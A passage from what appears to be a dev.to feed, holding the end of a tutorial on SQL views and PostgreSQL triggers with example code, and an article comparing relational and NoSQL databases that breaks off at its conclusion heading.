&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;column1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;column2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;...&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="k"&gt;table_name&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;condition&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  2. Usage:
&lt;/h4&gt;

&lt;p&gt;Once created, views can be queried like regular tables.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;view_name&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;SQL allows us to delete an existing View. We can delete or drop View using the DROP statement. Here’s how to remove the MarksView:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;DROP&lt;/span&gt; &lt;span class="k"&gt;VIEW&lt;/span&gt; &lt;span class="n"&gt;view_name&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Example Usage
&lt;/h4&gt;

&lt;p&gt;Assume we have the following table employees;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;employees&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;id&lt;/span&gt; &lt;span class="nb"&gt;INT&lt;/span&gt; &lt;span class="k"&gt;PRIMARY&lt;/span&gt; &lt;span class="k"&gt;KEY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="nb"&gt;VARCHAR&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;department&lt;/span&gt; &lt;span class="nb"&gt;VARCHAR&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;salary&lt;/span&gt; &lt;span class="nb"&gt;DECIMAL&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To create a view to display employees from the Sales department;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;VIEW&lt;/span&gt; &lt;span class="n"&gt;sales_employees&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt;
&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;salary&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;employees&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;department&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'Sales'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can then query the view like this;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;sales_employees&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To update the view;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;ALTER&lt;/span&gt; &lt;span class="k"&gt;VIEW&lt;/span&gt; &lt;span class="n"&gt;sales_employees&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt;
&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;salary&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ROUND&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;salary&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="n"&gt;bonus&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;employees&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;department&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'Sales'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When dropping the view, it is a safer approach to use the IF EXISTS clause to prevent errors if the view does not exist. Thus, to drop the view;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;DROP&lt;/span&gt; &lt;span class="k"&gt;VIEW&lt;/span&gt; &lt;span class="n"&gt;IF&lt;/span&gt; &lt;span class="k"&gt;EXISTS&lt;/span&gt; &lt;span class="n"&gt;sales_employees&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Conclusion
&lt;/h4&gt;

&lt;p&gt;SQL Views provides an efficient solution for simplifying complex queries, improving security, and presenting data in a more accessible format. By mastering the creation, management, and updating of views, we can improve the maintainability and performance of our database systems.&lt;/p&gt;

&lt;h2&gt;
  
  
  Triggers
&lt;/h2&gt;

&lt;p&gt;An SQL trigger is a database object containing SQL logic that is automatically executed when a specific database event occurs. In other words, a database trigger is "triggered" by a particular event. &lt;/p&gt;

&lt;h3&gt;
  
  
  Types of Triggers
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;DML Triggers (Data Manipulation Language): These triggers fire in response to data manipulation events (INSERT, UPDATE, DELETE).&lt;/li&gt;
&lt;li&gt;DDL Triggers (Data Definition Language): These triggers fire in response to changes in the database schema (CREATE, ALTER, DROP).&lt;/li&gt;
&lt;li&gt;Logon Triggers: These triggers fire in response to logon events to the SQL Server.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Timing of Triggers
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;BEFORE Triggers: These triggers execute before the triggering action is performed.&lt;/li&gt;
&lt;li&gt;AFTER Triggers: These triggers execute after the triggering action is performed.&lt;/li&gt;
&lt;li&gt;INSTEAD OF Triggers: These triggers replace the triggering action.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Key Operations with Triggers
&lt;/h3&gt;

&lt;h4&gt;
  
  
  1. Creating Triggers
&lt;/h4&gt;

&lt;p&gt;The basic syntax of an SQL trigger includes the creation statement, the event that activates the trigger, and the SQL statements that define the trigger's actions. Here’s a general template for creating a trigger.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TRIGGER&lt;/span&gt; &lt;span class="k"&gt;trigger_name&lt;/span&gt;
&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="k"&gt;BEFORE&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="k"&gt;AFTER&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="k"&gt;INSERT&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="k"&gt;UPDATE&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="k"&gt;DELETE&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;table_name&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;EACH&lt;/span&gt; &lt;span class="k"&gt;ROW&lt;/span&gt;
&lt;span class="k"&gt;BEGIN&lt;/span&gt;
    &lt;span class="c1"&gt;-- SQL statements&lt;/span&gt;
&lt;span class="k"&gt;END&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  2. Disabling Triggers
&lt;/h4&gt;

&lt;p&gt;PostgreSQL provides an easy way to disable triggers on a per-table basis using the ALTER TABLE command.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;ALTER&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="k"&gt;table_name&lt;/span&gt; &lt;span class="n"&gt;DISABLE&lt;/span&gt; &lt;span class="k"&gt;TRIGGER&lt;/span&gt; &lt;span class="k"&gt;trigger_name&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Sample Usage
&lt;/h4&gt;

&lt;p&gt;Using the Employees table schema in the previous section, the following are examples of triggers in action.&lt;/p&gt;

&lt;p&gt;The BEFORE trigger below checks if the salary of a new employee is below 1000 before insertion. If it is, the trigger raises an error to prevent the insert, ensuring a minimum salary requirement is enforced.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Create a trigger function&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;OR&lt;/span&gt; &lt;span class="k"&gt;REPLACE&lt;/span&gt; &lt;span class="k"&gt;FUNCTION&lt;/span&gt; &lt;span class="n"&gt;check_salary&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="k"&gt;RETURNS&lt;/span&gt; &lt;span class="k"&gt;TRIGGER&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="err"&gt;$$&lt;/span&gt;
&lt;span class="k"&gt;BEGIN&lt;/span&gt;
    &lt;span class="c1"&gt;-- Check if the new salary is below 1000&lt;/span&gt;
    &lt;span class="n"&gt;IF&lt;/span&gt; &lt;span class="k"&gt;NEW&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;salary&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mi"&gt;00&lt;/span&gt; &lt;span class="k"&gt;THEN&lt;/span&gt;
        &lt;span class="c1"&gt;-- If it is, raise an exception and block the insert&lt;/span&gt;
        &lt;span class="n"&gt;RAISE&lt;/span&gt; &lt;span class="n"&gt;EXCEPTION&lt;/span&gt; &lt;span class="s1"&gt;'Salary must be at least 1000.00'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;END&lt;/span&gt; &lt;span class="n"&gt;IF&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="c1"&gt;-- Otherwise, allow the insert to proceed&lt;/span&gt;
    &lt;span class="k"&gt;RETURN&lt;/span&gt; &lt;span class="k"&gt;NEW&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;END&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="err"&gt;$$&lt;/span&gt; &lt;span class="k"&gt;LANGUAGE&lt;/span&gt; &lt;span class="n"&gt;plpgsql&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;-- Create the BEFORE INSERT trigger using the function&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TRIGGER&lt;/span&gt; &lt;span class="n"&gt;before_insert_employees&lt;/span&gt;
&lt;span class="k"&gt;BEFORE&lt;/span&gt; &lt;span class="k"&gt;INSERT&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;employees&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;EACH&lt;/span&gt; &lt;span class="k"&gt;ROW&lt;/span&gt;
&lt;span class="k"&gt;EXECUTE&lt;/span&gt; &lt;span class="k"&gt;FUNCTION&lt;/span&gt; &lt;span class="n"&gt;check_salary&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The AFTER trigger runs after a new employee is added, and if they're in the IT department, it creates a new audit table with a timestamped name. This simulates a DDL operation triggered by specific conditions.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Create a trigger function&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;OR&lt;/span&gt; &lt;span class="k"&gt;REPLACE&lt;/span&gt; &lt;span class="k"&gt;FUNCTION&lt;/span&gt; &lt;span class="n"&gt;create_audit_table&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="k"&gt;RETURNS&lt;/span&gt; &lt;span class="k"&gt;TRIGGER&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt; &lt;span class="err"&gt;$$&lt;/span&gt;
&lt;span class="k"&gt;BEGIN&lt;/span&gt;
    &lt;span class="c1"&gt;-- Check if the inserted employee is in the 'IT' department&lt;/span&gt;
    &lt;span class="n"&gt;IF&lt;/span&gt; &lt;span class="k"&gt;NEW&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;department&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'IT'&lt;/span&gt; &lt;span class="k"&gt;THEN&lt;/span&gt;
        &lt;span class="c1"&gt;-- Dynamically generate a new audit table with a timestamped name&lt;/span&gt;
        &lt;span class="c1"&gt;-- This simulates a DDL operation inside the trigger&lt;/span&gt;
        &lt;span class="k"&gt;EXECUTE&lt;/span&gt; &lt;span class="s1"&gt;'CREATE TABLE IF NOT EXISTS audit_employees_'&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;to_char&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;NOW&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="s1"&gt;'YYYYMMDD_HH24MISS'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="s1"&gt;' (
            log_id SERIAL PRIMARY KEY,
            emp_id INT,
            action_time TIMESTAMP DEFAULT CURRENT_TIMESTAMP
        )'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;END&lt;/span&gt; &lt;span class="n"&gt;IF&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="c1"&gt;-- Return NULL for AFTER trigger (since we don't need to modify row data)&lt;/span&gt;
    &lt;span class="k"&gt;RETURN&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;END&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="err"&gt;$$&lt;/span&gt; &lt;span class="k"&gt;LANGUAGE&lt;/span&gt; &lt;span class="n"&gt;plpgsql&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;-- Create the AFTER INSERT trigger using the function&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TRIGGER&lt;/span&gt; &lt;span class="n"&gt;after_insert_employees&lt;/span&gt;
&lt;span class="k"&gt;AFTER&lt;/span&gt; &lt;span class="k"&gt;INSERT&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;employees&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;EACH&lt;/span&gt; &lt;span class="k"&gt;ROW&lt;/span&gt;
&lt;span class="k"&gt;EXECUTE&lt;/span&gt; &lt;span class="k"&gt;FUNCTION&lt;/span&gt; &lt;span class="n"&gt;create_audit_table&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Advantages of Triggers
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Data Integrity: Triggers help enforce consistency and business rules, ensuring that data follows the correct format.&lt;/li&gt;
&lt;li&gt;Automation: Triggers eliminate the need for manual intervention by automatically performing tasks such as updating, inserting, or deleting records when certain conditions are met.&lt;/li&gt;
&lt;li&gt;Audit Trail: Triggers can track changes in a database, providing an audit trail of INSERT, UPDATE, and DELETE operations.&lt;/li&gt;
&lt;li&gt;Performance: By automating repetitive tasks, triggers improve SQL query performance and reduce manual workload.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Conclusion
&lt;/h4&gt;

&lt;p&gt;SQL triggers are extremely useful tools that can really enhance your database's performance because they automate tasks, ensure data integrity, and provide error handling and logging capabilities. &lt;/p&gt;

&lt;h3&gt;
  
  
  Summary
&lt;/h3&gt;

&lt;p&gt;Understanding CRUD is only the first step in learning SQL; real efficiency comes from utilizing the strong, sometimes underutilized features that SQL has to offer. Views can streamline complicated searches and triggers can automate integrity checks. You're not just generating queries when you use these tools; you're creating more intelligent, self-sufficient data systems. Your entire stack will become more maintainable, which will reduce the amount of work your application must do.&lt;/p&gt;

</description>
      <category>sql</category>
      <category>database</category>
    </item>
    <item>
      <title>SQL vs NoSQL: Choosing the Right Database for Your Needs</title>
      <dc:creator>James K.</dc:creator>
      <pubDate>Tue, 29 Apr 2025 08:09:46 +0000</pubDate>
      <link>https://dev.to/james_kariuki/sql-vs-nosql-choosing-the-right-database-for-your-needs-1pkh</link>
      <guid>https://dev.to/james_kariuki/sql-vs-nosql-choosing-the-right-database-for-your-needs-1pkh</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;When choosing a modern database, one of the biggest questions is whether to pick a relational or non-relational database. For most of the last 40 years, relational database management systems (RDBMSs) that used the programming language SQL have been preferred.&lt;br&gt;
However, NoSQL-based non-relational database management systems are becoming more popular — particularly because data scientists want to expose their machine learning models and tools to more unstructured data.&lt;br&gt;
Let's explore these database types in greater detail, examining their uses, advantages, and popular implementations.&lt;/p&gt;

&lt;h2&gt;
  
  
  Relational Databases
&lt;/h2&gt;

&lt;p&gt;Relational databases organize data into interrelated tables, using a structured format that defines rows and columns within a schema. They connect information from various tables with keys. They use Structured Query Language (SQL) to store and retrieve data, hence the name SQL databases. A table utilizes columns to define the types of information being stored and rows to hold the actual data. Each table contains a column that must have unique values, referred to as the primary key. This primary key can be used in other tables to establish relationships between them. The images below represent how data is stored in these types of databases&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbi19c794cpm1xxlvsxkx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbi19c794cpm1xxlvsxkx.png" alt="Relational database example" width="800" height="600"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Advantages of Relational Databases&lt;/strong&gt;&lt;br&gt;
• ACID compliance: They satisfy a set of priorities that measure the atomicity, consistency, isolation, and durability of database systems. The general principle is if one change fails, the whole transaction will fail, and the database will remain in the state it was in before the transaction was attempted.&lt;br&gt;
• Better support options: Because RDBMS databases have been around for over 40 years, it's easier to get support and integrate data from other systems.&lt;br&gt;
• Normalization: The process of normalization involves organizing the data so that data anomalies are reduced or eliminated. This, in turn, reduces storage costs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Challenges&lt;/strong&gt;&lt;br&gt;
• Scalability: RDMSs are historically intended to be run on a single machine. This means that if the machine's requirements are insufficient due to data size or an increase in the frequency of access, you will have to improve the hardware, also known as vertical scaling. This can be incredibly expensive and has a ceiling, as eventually, the costs outweigh the benefits.&lt;br&gt;
• Performance: The performance of the database is tightly linked to the number of tables, the complexity of their architecture, and the volume of data in each table. Query performance often degrades as RDMs scale.&lt;br&gt;
• Flexibility: In relational databases, the schema is rigid. You define the columns and data types for those columns, including any restraints such as format or length. &lt;br&gt;
• Difficulties with sharding (the process of dividing a large database into smaller parts for easier management)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Popular SQL Database Systems&lt;/strong&gt;&lt;br&gt;
MySQL&lt;br&gt;
• Free and open-source&lt;br&gt;
• An extremely established database with a huge community, extensive testing, and lots of stability&lt;br&gt;
• Supports all major platforms&lt;br&gt;
• Replication and sharding are available&lt;br&gt;
• Simple to understand, very beginner-friendly&lt;/p&gt;

&lt;p&gt;PostgreSQL&lt;br&gt;
• Object-oriented database management system, functioning as a hybrid SQL/NoSQL database solution&lt;br&gt;
• Free and open-source&lt;br&gt;
• Compatibility with a wide range of operating systems&lt;br&gt;
• Active community and many third-party service providers&lt;br&gt;
• High ACID compliance&lt;br&gt;
• Uses pure SQL&lt;br&gt;
• Works best for use cases where data doesn't support a relational model, extra-large databases, and when running complicated queries&lt;/p&gt;

&lt;p&gt;Oracle&lt;br&gt;
• Commercial database with frequent updates, professional management, and excellent customer support&lt;br&gt;
• Works with huge databases&lt;br&gt;
• Simple upgrades&lt;br&gt;
• Transaction control&lt;br&gt;
• Compatible with all operating systems&lt;br&gt;
• Suitable for enterprises and organizations with demanding workloads&lt;/p&gt;

&lt;h2&gt;
  
  
  NoSQL/Non-Relational Databases
&lt;/h2&gt;

&lt;p&gt;Non-relational databases let you organize information in a looser fashion. They are also referred to as "Not Only SQL" (NoSQL) databases. Their storage models are optimized for specific types of data, allowing storage in diverse formats such as documents, key-value pairs, graphs, or columns. Below is an example of how data is stored in non-relational databases;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm51hpzk0077ayqlajwmp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm51hpzk0077ayqlajwmp.png" alt="Non-Relational db example" width="800" height="454"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Types of Non-Relational Databases&lt;/p&gt;

&lt;p&gt;Graph Stores&lt;br&gt;
•     Make data visualization easier&lt;br&gt;
•     Great at storing relationships between diverse data points with the help of nodes&lt;br&gt;
 •    Common examples: Neo4j and JanusGraph&lt;/p&gt;

&lt;p&gt;Column Stores&lt;br&gt;
 •    Schema-agnostic databases that can handle the querying of non-sequential data in real-time&lt;br&gt;
 •    Common use cases: web analytics and analyzing data from sensors&lt;br&gt;
 •    Popular implementations: Apache Cassandra and HBase&lt;/p&gt;

&lt;p&gt;Key-Value Stores&lt;br&gt;
 •    Simple, fast database management systems that store key-value pairs&lt;br&gt;
 •    Designed to fetch basic data quickly&lt;br&gt;
 •    Common use cases: leaderboards and shopping cart data&lt;br&gt;
 •    Popular implementations: Redis and Couchbase Server&lt;/p&gt;

&lt;p&gt;Document Stores&lt;br&gt;
 •    Databases with flexible schemas&lt;br&gt;
 •    Best suited to store semi-structured data and can handle dynamic querying&lt;br&gt;
 •    Common use cases: customer data, user-generated content, and order data&lt;br&gt;
 •    Examples: MongoDB and PostgreSQL (which can function as both relational and document store)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Advantages of NoSQL Databases&lt;/strong&gt;&lt;br&gt;
• Excellent for handling "big data" analytics: NoSQL databases remove the bottleneck of needing to categorize and apply strict structures to massive amounts of information.&lt;br&gt;
• No limits on types of data you can store: NoSQL databases give you unlimited freedom to store diverse types of data in the same place, offering flexibility to add new and different types at any time.&lt;br&gt;
• Easier to scale: NoSQL databases are designed to be fragmented across multiple data centers without much difficulty.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Disadvantages of NoSQL Databases&lt;/strong&gt;&lt;br&gt;
• Support challenges: It can be more difficult to find experienced users when you need to troubleshoot.&lt;br&gt;
• Compatibility and standardization issues: Newer NoSQL database systems lack the high degree of compatibility and standardization offered by SQL-based alternatives.&lt;/p&gt;

&lt;p&gt;By far the most popular NoSQL database, MongoDB offers:&lt;br&gt;
• Free to use&lt;br&gt;
• Dynamic schema&lt;br&gt;
• Horizontal scalability&lt;br&gt;
• Excellent performance with simple queries&lt;br&gt;
• Ability to add new columns and fields without impacting existing rows or application performance&lt;br&gt;
• Ideal for companies experiencing rapid growth or those with substantial unstructured data&lt;br&gt;
Other notable NoSQL alternatives include Apache Cassandra, Google Cloud BigTable, and Apache HBase.&lt;/p&gt;

&lt;h2&gt;
  
  
  Use Cases
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;When to Use Relational Databases&lt;/strong&gt;&lt;br&gt;
• Structured Data: For well-organized data that fits neatly into rows and columns with a standard format&lt;br&gt;
• Complex Queries: Perfect for applications (like CRMs and financial systems) that require sophisticated queries and join operations&lt;br&gt;
• ACID Transactions: Necessary for sectors where data accuracy, consistency, and reliability are crucial, such as finance or e-commerce&lt;br&gt;
• Mature Ecosystem: Relational databases offer decades of tools, support, and integration options for enterprise-level requirements&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;When to Use Non-Relational (NoSQL) Databases&lt;/strong&gt;&lt;br&gt;
• Flexible Data Models: Ideal for semi-structured or unstructured data that may change over time, such as social media content&lt;br&gt;
• Scalability: Designed to scale horizontally across multiple servers, making them excellent for big data, IoT applications, and growing businesses&lt;br&gt;
• High Performance with Simple Queries: Great for real-time applications requiring quick reads and writes&lt;br&gt;
The table below summarizes the differences between SQL and NoSQL databases.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F072z5a4tqon0tghgvklc.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F072z5a4tqon0tghgvklc.webp" alt="summary table" width="700" height="350"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

